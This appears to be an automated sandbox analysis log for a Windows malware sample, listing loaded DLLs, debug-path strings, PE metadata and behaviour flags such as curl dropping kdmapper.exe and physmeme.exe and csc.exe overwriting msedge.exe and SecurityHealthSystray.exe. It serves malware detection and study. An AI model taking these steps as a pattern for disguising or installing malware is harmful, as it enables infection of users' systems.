Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Section loaded: dnsapi.dll

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: 4tXm5yPtiy.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 4tXm5yPtiy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4tXm5yPtiy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4tXm5yPtiy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4tXm5yPtiy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4tXm5yPtiy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4tXm5yPtiy.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 4tXm5yPtiy.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 4tXm5yPtiy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000000.1489764684.0000000000183000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.4.dr
Source:	Binary string: System.Windows.Forms.pdb source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B03D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb66 source: 4tXm5yPtiy.exe
Source:	Binary string: em.pdb" source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B03D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: msedge.exe, 00000030.00000002.2113348313.000000001BEEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.pdb source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb source: 4tXm5yPtiy.exe
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000007.00000003.1502683045.000001FB23FD4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1503257349.000001FB23F90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502895817.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502820544.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502683045.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502820544.000001FB23FD4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: msedge.exe, 00000030.00000002.2113348313.000000001BEEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.pdb source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp

Source: 4tXm5yPtiy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 4tXm5yPtiy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 4tXm5yPtiy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 4tXm5yPtiy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 4tXm5yPtiy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

0_2_00007FF68B4B4BD0

Source: C:\Windows\Speech\kdmapper.exe

File created: C:\Edge\__tmp_rar_sfx_access_check_7138734

Jump to behavior

Source: kdmapper.exe.4.dr

Static PE information: section name: .didat

Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0016F640 push ecx; ret	5_2_0016F653
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0016EB78 push eax; ret	5_2_0016EB96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00440905 push ecx; retf	11_2_00440906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00452DD9 push eax; retf	11_2_004534E2
Source: C:\Edge\msedge.exe	Code function: 15_2_00007FFB4B104B92 pushad ; retf	15_2_00007FFB4B104B95
Source: C:\Edge\msedge.exe	Code function: 15_2_00007FFB4B4F8B28 push eax; ret	15_2_00007FFB4B4F8B29
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 21_2_00007FFB4B0F4B92 pushad ; retf	21_2_00007FFB4B0F4B95
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 21_2_00007FFB4B4E8B28 push eax; ret	21_2_00007FFB4B4E8B29
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 22_2_00007FFB4B0E4B92 pushad ; retf	22_2_00007FFB4B0E4B95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFB4AFED2A5 pushad ; iretd	30_2_00007FFB4AFED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFB4B102045 push eax; iretd	30_2_00007FFB4B10233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFB4B102074 push eax; iretd	30_2_00007FFB4B10233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFB4B1085D3 push ebx; ret	30_2_00007FFB4B10862A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFB4B1085FA push ebx; ret	30_2_00007FFB4B10862A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFB4B1D2316 push 8B485F91h; iretd	30_2_00007FFB4B1D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FFB4AFCD2A5 pushad ; iretd	31_2_00007FFB4AFCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FFB4B1B2316 push 8B485F93h; iretd	31_2_00007FFB4B1B231B
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B0E8AC3 push ss; iretd	37_2_00007FFB4B0E8AC9
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B0E967D push edi; ret	37_2_00007FFB4B0E9688
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B107A05 push eax; iretd	37_2_00007FFB4B107A4D
Source: C:\Edge\msedge.exe	Code function: 37_2_00007FFB4B0D4B92 pushad ; retf	37_2_00007FFB4B0D4B95
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B118AC3 push ss; iretd	39_2_00007FFB4B118AC9
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B11967D push edi; ret	39_2_00007FFB4B119688
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B104B92 pushad ; retf	39_2_00007FFB4B104B95
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFB4B137A05 push eax; iretd	39_2_00007FFB4B137A4D
Source: C:\Edge\msedge.exe	Code function: 41_2_00007FFB4B0C4B92 pushad ; retf	41_2_00007FFB4B0C4B95
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B104B92 pushad ; retf	42_2_00007FFB4B104B95
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B118AC3 push ss; iretd	42_2_00007FFB4B118AC9
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B11967D push edi; ret	42_2_00007FFB4B119688
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 42_2_00007FFB4B137A05 push eax; iretd	42_2_00007FFB4B137A4D
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Code function: 47_2_00007FFB4B104B92 pushad ; retf	47_2_00007FFB4B104B95

Source: msedge.exe.5.dr	Static PE information: section name: .text entropy: 7.556050087022216
Source: physmeme.exe.7.dr	Static PE information: section name: .text entropy: 7.9965850430662675
Source: wCnmgKwwXYQbWeNvWeCCOp.exe.15.dr	Static PE information: section name: .text entropy: 7.556050087022216

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Executable created and started: C:\Windows\Speech\physmeme.exe			Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Executable created and started: C:\Windows\Speech\kdmapper.exe			Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\UXzpIjDH.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\WpXNITDI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\VPYFfuwr.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\JlazcluE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\NKJXVMBv.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\uIZJMPyD.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\VltWWbmg.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\fZXNGngO.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\NhvHKDkY.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\EVLpKOHn.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\DqsZwsEl.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\GfhqKgmo.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\eGTFsMJp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\rWRTdVVu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\wDtsBZWh.log	Jump to dropped file
Source: C:\Windows\Speech\kdmapper.exe	File created: C:\Edge\msedge.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\XmyVeTRC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\TUtPMNAm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\zrKsasrd.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File created: C:\Users\user\Desktop\MQUzRRxE.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\iacMOeMk.log	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file

